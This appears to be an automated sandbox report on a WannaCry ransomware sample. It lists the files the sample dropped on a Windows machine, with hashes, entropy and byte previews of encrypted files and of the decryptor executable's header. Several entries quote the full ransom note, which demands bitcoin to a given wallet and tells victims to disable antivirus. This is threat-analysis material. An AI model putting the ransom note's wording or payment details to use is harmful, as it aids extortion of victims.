                                                  Preview:WANACRY!........Ll.>......N.v&.........%.j...w.n..-..V....ZNe..9..7E.i.I..E......OO........`T.....e..x.#.bA....&v.Y..^....iH..C.E......N_7..A..5...BG.E.tJ....o^P.1..)..u.]M.f....!5.5.... .2.O.y .0Ng'.c...S..Q0*...3...F.#Q..3.U.!....D./...b6.x..../........h............0l$..b>.b.....R.............<.....gt.8...9..*J..3..R..2E.....l.~.&...........6W.i5...:Y....!"....$_k....Lz....4Q...h5......G./.....\...B.L..U.i9z....%c...xAB...2H..G...-7f.M.7.+.s..I.y,......eL.V.Q..i../F.....+p.."...\H.yf..J.e.qO.....<.S8.-..z.;&).)z*SM.1 y..X`S.q...I...-q,KX2 ..o..t.%N..^z.}...>./....X..j..g...i>..M2.U......g.x.E.8RvXX.._.......!W..Z..v.......i}y.(..}r=I.xOs...m.e.~).4...."t1 .!....M-hYH..o..K.=....1.eE.......'s..........b>..*.Z..b........jmEm.}.x......i......0..yC ..^.B.]..dZ.0...7..M{....h.`..T.Z(.+'u....60y.8.2".r.`...5CnH....9.@.j.D...c6....J........p.U..K......@..P.#....|....T....H..5j..W...M.L)k.&t..I..~3.:.....@..K.,E..8.S..Pr....k....t..7....e..Mm.

                                                  C:\Users\user\AppData\Local\@Please_Read_Me@.txt

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                                  C:\Users\user\AppData\Local\@WanaDecryptor@.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):245760
                                                  Entropy (8bit):6.278920408390635
                                                  Encrypted:false
                                                  SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                                  MD5:7BF2B57F2A205768755C07F238FB32CC
                                                  SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                                  SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                                  SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 96%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\@WanaDecryptor@.exe.lnk

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:L..................F.... .....kM......kM.....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....b.M....:..M......t.2......J.. .@WANAD~1.EXE..X......V.C.V.C.....b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............5*.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226546..............n4UB.. .|..oT..9.......P..#.....n4UB.. .|..oT..9.......P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                                  C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133286130048509273.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):111896
                                                  Entropy (8bit):7.998395844064861
                                                  Encrypted:true
                                                  SSDEEP:3072:YZ3QGlCdIuI9LZXdLVl9ERrujqamdGulzmApndNBI:YGGduI9VXdLVgaCtVdNBI
                                                  MD5:BA9F8069B91187A9C959D395B88E043E
                                                  SHA1:E5AE9CAB771DF155664D9FAEF7EBF3FC9CEA55AD
                                                  SHA-256:D8CCE2ADC2DAF19E0B574531D802D0013A87DE93696134C9E788C0A986928652
                                                  SHA-512:87FE38124E5FE0E1EC78FE0CA7469065F12212AF9FF08727C5E5DD119639C5D5CC8EAB26478D8FE2B3BAEE42741AA8A64711458CEA9DA8C0020DDD8A9DA3E413
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......~.PP.(b..#aw.N=n......G.t.9.R.y[..E{n.$,3.67.B.....3.._^..V.o.,VHLiA......."....!P.oG..Q.w.........-.... ..m9...6..Eb....7.g......./..c.{<:q.Wo].....#=..<.C_5..S.3..d8..B!.j..4..]...@.... ...K4..........UT.[<..Np..n..u+.p...&[.FO..B<.....]>...............|...s7.|g$......:6%..Df...7.?..2.!.Y..eH..{...3.n.u.c.@.....^..f,.n4q....HiTWi...k.oL.../."vV2c=.(J.@..F.s..Z...Y....}....@5tA.,%....:..k>..A..!Qz.-.0..arc.........G?...x...........Bif.u....._...ksb..1m.&..Y.......Gbwn.0.K.h)e....5.%....V..6.A>AYG..4BF\U.7...........:..em.....`. .Ls9..+).Y..Bkw.w.....@.K..|....|@..^D.A...^@.~H;.l4.....@.l..`...FK..f.(.....[3r....6}..D......QTM'i....Y..Z!IX.v.)....I. .|...X.....5r.q0.1n.....xZ....a...c.2iB.j.^.^.K.S..3G.V.I:.g........"s.=....=>^.+../z...5.B.V...+...i...x'A.|z.....A.b.c6.-.J..E....'N7SD......q...qj.....0../.....S.C..7.6...l.....!.....#....m$.....T...=.d..;kyCR.WS...$#........1..RMb.%IyD.7Q.'.R......R..v......[...).}!.#{..o.:~I

                                                  C:\Users\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133286130348618804.txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):111896
                                                  Entropy (8bit):7.998277506079741
                                                  Encrypted:true
                                                  SSDEEP:3072:IetzI9nslYegg24MDfNWtS1l1MaJG8L7+WTm:IcunS0UtS1DMeGKy
                                                  MD5:DA9B6D9DA80F8C4413EA37357608C442
                                                  SHA1:7BABFEA22847A82ADCE61424E2BB901765428C31
                                                  SHA-256:B9F9B6F683CE2899E6A7F714197BBD3A555C879EDCF16AF273103B3BD315AA80
                                                  SHA-512:8095BF253BC784988F8242E33F75FA4ED8BC307CA6F2E9400C35C8455E17277E12C76BEE15DDD98531FA8CCC9DBF78AC607439C8A283BF1E59D306ADB0DFAACC
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!......r...8.+.-....n.nJ.R..<.+{.....+.....!,.;..m.....w...(.|..C....m~.$.p.W.U.t3....s.#Z.^..`...>..N..".np..#.,....E...)U......*..)..85......T?R.sm-b...7..D..Gq..FH...C.X.;....}....._}<...iV.VO.RR..2B3`.1..H. ih..,.h.9B...p.3K..2+.....{...D...K%T..............3...YB...H.!*l....r~;.3@:..ie...@g.....I.W..T./..Y..S.-...m.K$M..e$....M..R......F..?..h...{f...D){..g.......|.X....=.........K.........C(.V).O...Y..:].;......r..~L....&.\........4..B"...&.Q.;..4.6F.;..............6......S......|...'.%[m.3....3A.k5)......?.V............I^6I...P..`..R&vG...=...?....b..$ze....^).fa.:R.5!.v.......w.>..X..f!5..f........T..JX...n.r.V~....V.z.[.y#..:.......g.S..R%.....r...6..!.2...0.`.q......O......6......l......Q..R..g..@..........{.t......<.d.:.<.E\0.o..7L2.}.....F$7q.l..,YX.Q.\m.Z.....JU.J.!<.}..s<)....C......v.%.cv4.....-L,.....S..O..u...29.a..{+.M./z..(|$......;y.<..2.R..Nu./...N.%8:^l......}.d.7gv.z..D..=8+..Qq.l1K...^..7..5...G/4.C/,.f...

                                                  C:\Users\user\AppData\Local\ConnectedDevicesPlatform\8628dc546dc99469\@Please_Read_Me@.txt

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                                  C:\Users\user\AppData\Local\ConnectedDevicesPlatform\8628dc546dc99469\@WanaDecryptor@.exe.lnk

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:L..................F.... .....kM......kM.....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....b.M....:..M......t.2......J.. .@WANAD~1.EXE..X......V.C.V.C.....b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............5*.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226546..............n4UB.. .|..oT..9.......P..#.....n4UB.. .|..oT..9.......P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                                  C:\Users\user\AppData\Local\ConnectedDevicesPlatform\8628dc546dc99469\ActivitiesCache.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1048856
                                                  Entropy (8bit):7.9998300252662045
                                                  Encrypted:true
                                                  SSDEEP:24576:MAwRu3/VCZ6rYJvqu/D+PKxUPys+5BTndMod/tN+2B:MAwR6/VAMkqub+QuysaTeqP
                                                  MD5:CA6069142F6CBAD8679ED9E20FE9FB95
                                                  SHA1:E9B08DC42D4A87DAAB68DF8DB4E97026E40ED1CF
                                                  SHA-256:1D919FBF3DE33CADA8FDBB7C52BD7D0655636917A753BB0085DCEA86C12C0063
                                                  SHA-512:CB39A0166284F6EFA3D4D1B18B87A77A33C50D7438DF4C9F6CD13F469603DC0EE1D1D439234223376E44307B387668CD184D2AD00F5B1C9B809F2D528B8C1343
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!......6s.M..?..&^b...p.z.&.UI.k..6...s.O..QG.....Q..}.n~Un....3.ga..........9....2.FG.G8...f..fS..>m.l..mX._..7N.K .L.<!O.n.c.B.=..j....J..7S[.m..;..9".K9.../;..l.c....'.;.p.4....l.........~.r...Cf......W.4......d..D...j.".s.eY...=.j.s.+<...............^.@To_Hd4.......*&...5.B..:.n..U...@.5Z....p..+8..Z...,.r.._..Mt.R...]m$(...l.m.G.....h.8...B......oB"..:s....U..e,d.I...$T........#.......!...... {d...(..[..EJ...#.H.N...s;...q...,....ba....A:..yB`.5.0,..&.....GB..%z.N.^...1)....yl....^l....L..;..4z.;.g.P....1.......c..x"N..`B&LjC..xZ..n..y.s....P[......e...7...Rp.Q...I....r..%..h.`t....vZ6.H..9.J<.T...`.?N....^..9p..9...y.D.J....+.^..?.k..1.&4o..H2O.\H.C...F.i.G.H'Y..`&..)..@+.=.._k....-.I1....O...%..j.i.$... W*..r'#.cj...xE.K=.........,wJ..:95.)*..W&o._..E....+..8L..k.t.Ct.2.q~.N' ...q..C=y.1.J.-.yxC...\#.C^qE.^.\O....5.1..o....q-..P..!.)..M. F....2ar..Jn8.)!.....@....2D....m..f7....1Xl....`......$.@.}{...F6.[,..n..X.9.7...s.+

                                                  C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\@Please_Read_Me@.txt

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                                  C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\@WanaDecryptor@.exe.lnk

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:L..................F.... .....kM......kM.....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....b.M....:..M......t.2......J.. .@WANAD~1.EXE..X......V.C.V.C.....b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............5*.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226546..............n4UB.. .|..oT..9.......P..#.....n4UB.. .|..oT..9.......P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                                  C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1048856
                                                  Entropy (8bit):7.99983740974304
                                                  Encrypted:true
                                                  SSDEEP:24576:CCMoQ+p0A/kIrYWfIfm/TeevnT0eF9Njrd:CC8DIrYcIyJnTNZjrd
                                                  MD5:3328E8CA5C1C64A3BA8085C6E6FB38A8
                                                  SHA1:C0E2C1A53BE9444459F9645A975F4BD9C2F1E2FD
                                                  SHA-256:D8538559AD03041DA0FAA145EA78AD9BBA48B24EA3084FFA6ACF593BB2856AB1
                                                  SHA-512:231DBAE1F6DE8EC2AE62A7A2D1340E03E5F437D38132511B8545A6BD2D844CBAE5CAF7E84828DDD79F9DD81255A06C008432E79A39D568FD73DCC130F099952C
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....c"...Q3.......s..`..'=.,.BYp..g....|..|.*<.x-...4.4uB.%..c4<d..R.....K....O...L.....0..s..D}.b....{.H..6...t.`....1(.i.w....h.L...HQ..F1."}......h.>..9a....>:..Z..DH..:&.J.k^....}w....6.....x`.....v......]-....G....^_.>.!.p....1....C.^......u.............Y.Z`....;..)..5.X.v.h.@r.(....@..z..7\^...=...L.....Q.Y.D.q....jl..(..w[u.LP8*..r.e...!H`1.-.'.....<...|.#..W...~.qu....4.g.H{ub........TpK..).-.gI.Xw......sn.,...-?..{.eqi..'...q....B..N...|..b&....'.4..'...C...$...... ..I.....!...PoPB...;...E.....lT.....}..XSF{ ?A.&...o#.p..[|....,.#.........0.Q+.....x4..i..)...dB...5.6..d~.#^.....8;.f.&.C.qs.G......Ow]'..-.k-..:...*t..E......Zb.....YR.l.J..}W......c..\..?;.OG.:..Q/.(....Dy.....A`c)zt.c.z..M}.W..:Y..<.#.....=_.^M...5..$...O.Me..Z.X.C...8!k{F.H...R..k.<.^K..-..^.=E.k....`M..8......'..........t|..6...[.<......n\l6H5........(H.*..G.z"{.c8i~E.t.?..3.<.$KZQ.!E..4p..`...}...]Bx.?YiG...q/.......6.z..dv.>.6..\lL!.T......^..=.T..+e

                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\icon_128.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):3656
                                                  Entropy (8bit):7.948008681028875
                                                  Encrypted:false
                                                  SSDEEP:96:oys/MDUE7IQXRmAdZSzd3h+zwShdyFc6EskpdPb:d4LE7FRyzdTtFodj
                                                  MD5:B72B630062CA8B3B3AAA8188B5B45893
                                                  SHA1:34EDF81DE205F709C218609135667DE8241BB3D6
                                                  SHA-256:3BE20D2BD26B433AD437CEA7C7431E21CB9D11971680B4C00FA021B2288F6C34
                                                  SHA-512:99D2CB08076F525BA11AC2773405AD24E9F494E17545CAD2AD45547F1156E9E5D20B5E54AFC6A2D0E7524AF9BB02653AF3B213BA04C5F30E7446DF095287AB5B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....t.......o..CDe.J....}....7i.`.X..W&.-..&Z..+.5}r.Hc...M u.yo.....#.Dp YQD...C.1..;......|..9.m...v2.z.b....j..s<...u.Kq")9...Z.~...{.....H3.1.J..P...<Qf..D-.p..:..T.2<..$}.Z..m)h....[.s/..ij.R...^....W...y.....`k.VQ.6..7@...|o...b=O.&...Z9).ai....,........h3.T...8Q.).G.brz.w...$2........ .<.0...9.2..E...9.Ctq+.~/.6..^..B.e....$.1..:..\....1<..Z8.z.g&9...0.+.a).....^ntW.5T......&.Pa.9.\.%..5..Ch.\jrm..l..../...@oYb.%^.........5..h3Qyr.%Yk.+..Zw....dHg..6$5...b.......7a<..^..M... Y.:,.7.<....'.O.....H...~.z....Z&A.;.@.>_..S...!..t3.W.}..r#T.n0.nE.*Nr........r........@..Q.]..x.Q.i.}t....zT<McT..BW...pNM..'...5Iq?!...kw$.........k.wN.0.....o...$.:o...=}..h..u....X...iw....N..a..u.....ry....Z!U.W...y\..tD6....S4OP...k.L..a.u.9M.O..,Ie.o.,.....F..<.>f...}On..SChe3s...8..)..........E._.'.e.K...{.\...St......N..Kg..A..k.E....j.a...j..%.P.....V(;-C'<....).<..".'/^iy.^..Zg.*.r.N3....>Y....kuA!.y!...G..C..{.y....GR$.[l....$).'.7.f-...WI<.+^

                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\icon_16.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):440
                                                  Entropy (8bit):7.442528140001084
                                                  Encrypted:false
                                                  SSDEEP:12:bkE4yaF2xvOPIcSNnCZchM+yqYNRFX1jKn:bkeGOmPSNnCAclE
                                                  MD5:7CD22638C99FBA8756CB59B74944B81F
                                                  SHA1:667C36D9DBE6EA6A3080C9425ADE6673BD54FCCE
                                                  SHA-256:003A244375441FDBB7DABD73CBF939A61ABE882D0A2EC66991CB0A8DDDA3C920
                                                  SHA-512:076167D9A2874C998AFE359C6B5EF2F3F502A73A043C9F4A3D61B56A761B3A642AD2FB0624EEFF49704346F26F1D989FF62E10ABD759B8A799DA65D59A4FA71E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....*.~m..L$.ll4.RW.K..\..k_hJ.U.......JX,....f....Z^..M|.Y(F.GB..o.U..E...2......y....>..#T.......sq.._`O.Ts....r.... ..e.$z.l..W........,^...}.a.?C..*..sqb..R$a..]+.g.b.U7.%..y../...Sl.C....%...u....*.$....g=F8.?$..%............FH.,`.+>....W..q.............)..qK=7..:...X^....2Zr...d']..(..\m!<q.....A..LO.U.p.cS..RLa.Q.V.;.#.@.N.<...,....N>C>..R...e.G.]..a..Ii?.,.l._........$y.....pI....aj.. ..Kny5...>.g7....4

                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\main.js.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):376
                                                  Entropy (8bit):7.337159390339733
                                                  Encrypted:false
                                                  SSDEEP:6:bkEOIBkhkXjhHOpnegpkZrloD2WxEuidCb6lyjeSoQG+MqtgKD+CFHsrkubibJom:bkEOIBkKHypkZru1xcCLqSfMqtgTC9aW
                                                  MD5:E5EDAB2D60A9AF82A70FB644AF6DF797
                                                  SHA1:2F4BE4544D651BA82940AACC3E12B7905C64A905
                                                  SHA-256:9532C1C24290D80AF07902756649A926F1A898696883EC521A9A5E68EB3DB3C8
                                                  SHA-512:F7EFDDB0881303C37BA4B82CE1874F644D44DE03AE852F69C1C8C59C724AD774BA7A9F741EBFD4943BC54A21D7194E825F3451344818A6160B1FC3B3B2DB9F7A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....-.M..u...$.....wf..`(. 7..)......gx.......u...^.,iO..b4".+....oC.l..3.v...5.OA.`...=S....N...V....yzv..9F.,.k.....$........c..F.....n.....M.c...2M.sT.)..O....+....H.u...X......H.D.+*.i...<...4.....8}..!.:./.tp....uP..!.eD.7O?..|g...).....E-##....._.............l/.....#...@."........m..pa.`..J....;ygP.$.m.bN..I^_...UPQV..H!.%...*..|...Tp3_.;_\.^.

                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\icon_128.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):3496
                                                  Entropy (8bit):7.945077767566454
                                                  Encrypted:false
                                                  SSDEEP:96:orbJapT7RSgbEXptc7zYK/lq8SlFJrVhFVEtsozRS5EZ8Q56F1:OJav/Qtc7zYMq5FdVhFe23S8QYF1
                                                  MD5:BA972405EDB380AACE73036257C7351B
                                                  SHA1:B09912815E94A68851FEDE86340ABE8DE814815E
                                                  SHA-256:47D2113B0106A81832139520284C79D5D29BECBB76D8F647B31952E6DCB2C4B3
                                                  SHA-512:503AF5AE4851D48A8F07FBB3E38097C697AF9A491050E4FB5F66755D9A66B67DAB092F4C0BAF1F7E872B8C97263413556E1418243DCD8A6BEC23EAA392BF9175
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....Jk.W.`$.j.j.E..FP....X.z..U3.X......Mq...=..+og..J|=].. ...3........`$..+ezF...C...*..s...4...0+.yo.....U...4s...X..l.E.w..6....}.z.y).R.*b"w..p_I.\..#.BN.c=_..[...S.|..=.:V....tx..`).....GI.a....S~a.....m...B.e....m.. .*...."!.C@vw.E.=....ZHk.a.............|4d)...x..b..(.J..<.\hgw;.. 0..7.....c.Gz..d.1.(...N..r.(.F@Dq..V..P.!OX.,k.->...@.#P.$.:u.Y.=I.-[..G..X.>..Y...~....`{R..\.E.W...=...|.k(...e....Q'............J..cfbeR........B.......<...R.e^.9.E...{.tEb.b.;.u>..........S..py#9)@a.\ ..I.o...Q..`.U.C..2J...>.~o.].........+b.H..,..nG.C.hF..'UV...k..7].c[jKz......tF...c......o.BK...<..x.k9....j..5p;.].0.....v.&O...L|.l=cc....2j.'.;..$.Piby....?.h.E....g+.33%..j.n.Ir.a.......$..8.PX......)8.u.sW..8.....Q....wK...Q.{/..4..(...Nrh?..@..0$..L...!.u.Q...K.6.(.|M.t..J.%.]......8..O.4...X....Xt'.....9pY..r-....gR...O.@..+d.....}..B...7b4.U...z@...%.g..E..hS..Ld.O....<..w6..).......Q..7.+3..Gd...i.U?......W6..e].Lk._........q.nd$i.t;.d.(.L[.|.c.

